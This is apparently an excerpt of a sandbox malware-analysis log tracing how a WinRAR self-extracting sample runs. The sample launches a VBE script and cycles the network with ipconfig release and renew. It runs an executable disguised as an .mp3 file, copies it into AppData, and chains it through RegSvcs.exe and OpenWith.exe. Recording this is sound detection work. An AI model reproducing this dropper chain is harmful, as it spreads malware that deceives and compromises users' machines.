                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DF1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,16_2_00DF1F53
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003E5B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,7_2_003E5B27
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003DDC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,7_2_003DDC9C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003F4089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,7_2_003F4089
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B1EBD3 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00B1EBD3
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3File created: C:\Users\user\AppData\Roaming\wlnkJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
                Source: C:\Windows\SysWOW64\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCommand line argument: sfxname0_2_00B2454A
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCommand line argument: sfxstime0_2_00B2454A
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCommand line argument: STARTDLG0_2_00B2454A
                Source: ngPebbPhbp.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\SysWOW64\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeFile read: C:\Windows\win.iniJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: ngPebbPhbp.exeReversingLabs: Detection: 55%
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeFile read: C:\Users\user\Desktop\ngPebbPhbp.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\ngPebbPhbp.exe "C:\Users\user\Desktop\ngPebbPhbp.exe"
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c qwlvpmrupf.mp3 tnlupe.mp3
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 qwlvpmrupf.mp3 tnlupe.mp3
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c qwlvpmrupf.mp3 tnlupe.mp3Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 qwlvpmrupf.mp3 tnlupe.mp3Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: dxgidebug.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Section loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Section loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Section loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Section loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Section loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Section loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Section loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Section loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Section loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Section loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Section loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Section loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Section loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Section loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSection loaded: apphelp.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: ngPebbPhbp.exeStatic file information: File size 1684188 > 1048576
                Source: ngPebbPhbp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: ngPebbPhbp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: ngPebbPhbp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: ngPebbPhbp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: ngPebbPhbp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: ngPebbPhbp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: ngPebbPhbp.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: ngPebbPhbp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: ngPebbPhbp.exe, 00000000.00000000.1695435766.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp, ngPebbPhbp.exe, 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                Source: Binary string: wkernel32.pdb source: OpenWith.exe, 0000000F.00000003.1934628698.00000000058C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934512366.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wkernelbase.pdb source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: ntdll.pdb source: OpenWith.exe, 0000000F.00000003.1933709794.0000000005990000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1933480930.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb, source: qwlvpmrupf.mp3, 00000007.00000003.1924745407.000000000113D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000000.1924462508.00000000005C2000.00000002.00000001.01000000.0000000C.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2054601563.000000000182C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2185950312.0000000001A71000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2271006709.0000000001493000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: OpenWith.exe, 0000000F.00000003.1934031698.00000000057A0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934260975.0000000005940000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: ntdll.pdbUGP source: OpenWith.exe, 0000000F.00000003.1933709794.0000000005990000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1933480930.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: OpenWith.exe, 0000000F.00000003.1934031698.00000000057A0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934260975.0000000005940000.00000004.00000001.00020000.00000000.sdmp
